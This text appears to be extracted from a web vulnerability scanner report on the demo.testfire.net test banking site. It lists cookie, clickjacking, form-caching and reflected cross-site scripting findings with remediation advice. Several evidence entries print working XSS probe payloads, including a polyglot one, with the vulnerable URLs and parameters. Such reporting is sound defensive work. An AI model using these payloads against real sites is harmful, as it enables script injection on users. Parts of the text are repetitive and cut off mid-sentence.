Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:P/I:N/A:N
Service: http
Reference:
https://www.owasp.org/index.php/Testing_for_cookies_attributes_%28O
TG-SESS-002%29
Evidence:
DetectionDetails: Cookie Vulnerabilities Found
jsessionid = 7dea7694e36255c4c48824f9a0de4e13
Path = /
Host = 65.61.137.117
Cookie does not have a secure attribute
Cookie can be cached. Missing cache control and pragma tags
Request: GET http://65.61.137.117/ HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
Remediation:
The Secure flag must be set on session cookies for applications served
over SSL.
For all session cookies, the HttpOnly flag limits script access to the
session in cases of Cross-Site Scripting issues. Proper caching headers
should be set for responses carrying the cookie.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://demo.testfire.net:8443/sendFeedback - name
Injection: <script>alert(15650661.00557)</script>
Detection: An alert was detected containing 15650661.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650661.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
Remediation:
Before accepting any user-supplied data, the application should
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650658.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650658.00947)</script>
Detection: An alert was detected containing 15650658.00947
Request: GET
https://demo.testfire.net/util/serverStatusCheckService.jsp?HostName=
%3Cscript%3Ealert%2815650658.00947%29%3C%2Fscript%3E
HTTP/1.1
Referer: https://demo.testfire.net/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - https://65.61.137.117/sendFeedback - name
Injection: <script>alert(15650642.00557)</script>
Detection: An alert was detected containing 15650642.00557
cfile=comments.txt&name=%3Cscript%3Ealert%2815650642.00557%
29%3C%2Fscript%3E&email_addr=jsmith20%40kelev.biz&subject=_W
SETESTDATA&comments=_WSETESTAREADATA&submit=+Submit+
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: https
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
GET -
https://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%
3Cscript%3Ealert%2815650642.00947%29%3C%2Fscript%3E -
HostName
Injection: <script>alert(15650642.00947)</script>
Detection: An alert was detected containing 15650642.00947
Request: GET
https://65.61.137.117/util/serverStatusCheckService.jsp?HostName=%
3Cscript%3Ealert%2815650642.00947%29%3C%2Fscript%3E HTTP/1.1
Referer: https://65.61.137.117/status_check.jsp
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
CVSSv2: AV:N/AC:M/Au:N/C:N/I:P/A:N
Service: http
Reference:
http://www.cert.org/advisories/CA-2000-02.html
http://www.owasp.org/index.php/Cross-site_scripting
http://www.owasp.org/index.php/Data_Validation
http://www.owasp.org/index.php/Review_Code_for_Cross-site_scripting
Evidence:
DetectionDetails: Cross-Site Scripting vulnerability found.
POST - http://65.61.137.117/sendFeedback - email_addr
Injection: javascript://'/</title></style></textarea></script>--><p"
onclick=alert(15650656.00617)//>*/alert(15650656.00617)/*
Detection: An alert was detected containing 15650656.00617
cfile=comments.txt&name=CHSuser&email_addr=javascript%3A%2F%
2F%27%2F%3C%2Ftitle%3E%3C%2Fstyle%3E%3C%2Ftextarea%3E%
Remediation:
Before accepting any user-supplied data, the application should
validate this data's format and reject any characters that are not
explicitly allowed (i.e. a white-list). This list should be as restrictive as
possible. Before using any data (stored or user-supplied) to generate
web page content, the application should escape all non alpha-numeric
characters (i.e. output-validation). This is particularly important when
the original source of data is beyond the control of the application.
Even if the source of the data isn't performing input-validation, output-
validation will still prevent XSS.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used as part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=D5CC99799F62567D97687377E9E57D1E;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:05:09 GMT"]}
url: http://65.61.137.117:8080/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used as part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=7396ECE6F9230BEA6656EC9364C1EEE4;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:04:14 GMT"]}
url: http://demo.testfire.net:8080/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used as part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=6AD1B35870824ABE33FC4A206303ADA1;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:06:04 GMT"]}
url: https://demo.testfire.net:8443/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used as part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=5E429D789B42131617FC21FC2C7092B0;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:06:59 GMT"]}
url: https://65.61.137.117:8443/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=91AE2C06F7F66EB7AC4721CA7926E84A;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:03:20 GMT"]}
url: https://65.61.137.117/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=6FBDC1BA64262E169CD8AA130C5A6D25;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:00:33 GMT"]}
url: http://demo.testfire.net/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=43417874F1E2104EC67B2F9DEE17E8CE;
Path=/; HttpOnly"], "content-type"=>["text/html;charset=ISO-8859-
1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug 2019
03:01:27 GMT"]}
url: http://65.61.137.117/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
This page does not utilize the benefits that the X-FRAME-OPTIONS or
Content-Security-Policy: frame-ancestors HTTP header elements offer.
These headers should be implemented to prevent the page from being
used in part of a click-jacking scenario. The headers specify which
systems (if any) are allowed to embed the current page within an HTML
frame.
CVSSv2: AV:N/AC:H/Au:N/C:N/I:P/A:N
Reference:
https://www.owasp.org/index.php/Clickjacking
https://www.owasp.org/index.php/Clickjacking_Defense_Cheat_Sheet
Evidence:
Headers: {"server"=>["Apache-Coyote/1.1"], "set-
cookie"=>["JSESSIONID=ECBF550A2EE43223488AC21A19DCD097;
Path=/; Secure; HttpOnly"], "content-type"=>["text/html;charset=ISO-
8859-1"], "transfer-encoding"=>["chunked"], "date"=>["Tue, 06 Aug
2019 03:02:22 GMT"]}
url: https://demo.testfire.net/
Remediation:
Add Clickjacking protection with one of the following response headers:
X-Frame-Options or Content-Security-Policy with frame-ancestors
directive.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net:8443/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net:8080/index.jsp?content=personal.htm HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
forms Data submitted via forms present on pages without caching directives
can allow data to be cached in the browser/cache, giving access to the
data.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://demo.testfire.net/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net:8080/index.jsp?content=business.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
Request: GET
http://65.61.137.117:8080/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=76AA5AC0228D700D9219ED73F9533B78
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET -
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/index.jsp?content=inside_contact.htm
HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=44C815873649B1433E310F19F9B9450B
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net:8443/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net:8080/sendFeedback
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
cfile=comments.txt&name=CHSuser&email_addr=jsmith20%40kelev.b
iz&subject=_WSETESTDATA&comments=_WSETESTAREADATA&submit
=+Submit+
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Request: GET
https://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=0565231311CE173563DB02789CEE78E3
Upgrade-Insecure-Requests: 1
Referer: https://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117:8443/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117:8443/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - https://65.61.137.117/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117/index.jsp?content=business.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
POST - http://demo.testfire.net:8080/doLogin
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
uid=CHSuser&passw=Passwor1&btnSubmit=Login
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
Request: GET
http://demo.testfire.net:8080/search.jsp?query=_WSETESTDATA
HTTP/1.1
Cookie: JSESSIONID=03939398EA63CCAEE93295DC28E42282
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net:8080/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing the form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net:8443/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
https://demo.testfire.net:8443/index.jsp?content=personal.htm
HTTP/1.1
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/search.jsp?query=_WSETESTDATA
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Request: GET
http://demo.testfire.net/search.jsp?query=_WSETESTDATA HTTP/1.1
Cookie: JSESSIONID=B95638AFC2EBB1AEEE06E0A48503002C
Upgrade-Insecure-Requests: 1
Referer: http://demo.testfire.net/
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net/index.jsp?content=personal.htm
No Caching Directives Found.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://demo.testfire.net/login.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/feedback.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://65.61.137.117:8080/
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
response containing form.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Limit Exceeded. 5 more item(s) were reported.
Remediation:
Caching can be disabled by setting the "Pragma: No-cache" and
"Cache-control: No-cache,No-Store" HTTP Header values in the
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: http
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - http://demo.testfire.net:8080/index.jsp
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
CVSSv2: AV:L/AC:L/Au:N/C:P/I:N/A:N
Service: https
Evidence:
DetectionDetails: Form Caching Vulnerability Found
GET - https://65.61.137.117/index.jsp?content=personal.htm
No Caching Directives Found.
The application should use BOTH 'pragma:no-cache as well as ' Cache-
Control:no-Store, no-Cache' headers to prevent caching.
Remediation:
